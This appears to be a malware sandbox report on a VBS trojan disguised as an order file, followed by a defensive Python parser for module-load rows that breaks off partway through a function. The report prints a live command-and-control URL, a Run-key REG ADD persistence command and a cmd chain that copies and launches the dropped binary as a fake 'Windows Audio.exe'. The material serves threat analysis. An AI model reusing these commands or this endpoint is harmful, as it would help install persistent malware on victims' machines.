                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readys
                            Source: wscript.exe, 00000003.00000002.2596301073.000001E9CD1EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyt
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readyP
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readys
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                            Source: JaG.exe, 00000005.00000002.2292880836.0000000007F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                            Source: wscript.exe, 00000001.00000002.1345634293.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD39D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: amsi64_8076.amsi.csv, type: OTHER
Source: Yara match | File source: amsi64_5872.amsi.csv, type: OTHER
Source: Yara match | File source: amsi64_480.amsi.csv, type: OTHER
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F8428
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F4A48
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F7538
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024FBA48
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F58C8
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F7F78
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F4A3A
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_04731590
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_0473D41C
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F44B68
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F44B59
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F4EA90
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F506E0
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F54E80
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F5DDA0
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F5E538
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F56B10
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F54E70
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F58B20
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F58B10
Source: ORDER-25013-67789543AX.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@28/10@1/3
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ggh[1].js
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\rHMh.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ORDER-25013-67789543AX.vbs | Virustotal: Detection: 13%
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\JaG.exe "C:\Users\user\AppData\Local\Temp\JaG.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js"
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wpdshext.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, msxml3.dll, msdart.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, msxml3.dll, windows.storage.dll, propsys.dll, ntmarta.dll, wininet.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, fwpuclnt.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, msxml3.dll, msdart.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll, dwrite.dll, windowscodecs.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, msxml3.dll, windows.storage.dll, propsys.dll, ntmarta.dll, wininet.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, fwpuclnt.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, msxml3.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\wscript.exe | Section loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll
                            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded (in order): iphlpapi.dll, winnsi.dll, mswsock.dll
                            Source: C:\Windows\SysWOW64\PING.EXE | Section loaded (in order): iphlpapi.dll, winnsi.dll, mswsock.dll
                            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
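The module-load rows above are easier to act on when read per process instance rather than per row: a Windows Script Host process that pulls in wininet.dll/winhttp.dll, the Winsock name-space providers (mswsock.dll, dnsapi.dll, nlaapi.dll) and wbemcomn.dll has acquired network and WMI capability that a plain local script never needs, and a .NET binary dropped to Temp that loads amsi.dll is having in-memory assemblies scanned. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in the shape used on this page (with or without the column separator the extraction lost, and ignoring the "Jump to behavior" link text), splits consecutive rows into process instances with a heuristic of its own (a repeat of an instance's first loaded module, such as version.dll for wscript.exe or iphlpapi.dll for PING.EXE, starts a new instance), and flags script hosts that loaded a network or WMI stack. The DLL-to-capability buckets, the sample rows, the instance heuristic and the verdict wording are this example's assumptions.

```python
import re
from typing import List, Tuple

# Constructed sample: a condensed subset of the "Section loaded" rows on this
# page, kept in the page's extracted shape (some rows run "exeSection" together
# and carry the "Jump to behavior" link residue). Not a sandbox export.
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
"""

# Capability buckets (this example's assumption about which DLLs imply what).
STACKS = {
    "http": {"wininet.dll", "winhttp.dll", "urlmon.dll"},
    "sockets": {"mswsock.dll", "dnsapi.dll", "nlaapi.dll", "winrnr.dll", "napinsp.dll", "pnrpnsp.dll"},
    "wmi": {"wbemcomn.dll"},
    "crypto": {"cryptsp.dll", "rsaenh.dll", "cryptbase.dll"},
    "clr": {"mscoree.dll"},
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Tolerates a missing " | " between the source path and the description and
# strips any link text glued to the DLL name.
ROW_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE,
)


def parse_rows(text: str) -> List[Tuple[str, str]]:
    """Return (process_path, dll) pairs in report order."""
    pairs = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            pairs.append((m.group("proc"), m.group("dll").lower()))
    return pairs


def split_instances(pairs: List[Tuple[str, str]]) -> List[dict]:
    """Group consecutive rows into process instances.

    Heuristic (assumption, not the sandbox's own logic): a row whose DLL equals
    the first DLL of the current instance starts a new instance of that process.
    Repeats of other DLLs (ucrtbase_clr0400.dll twice) stay in the same instance.
    """
    instances: List[dict] = []
    for proc, dll in pairs:
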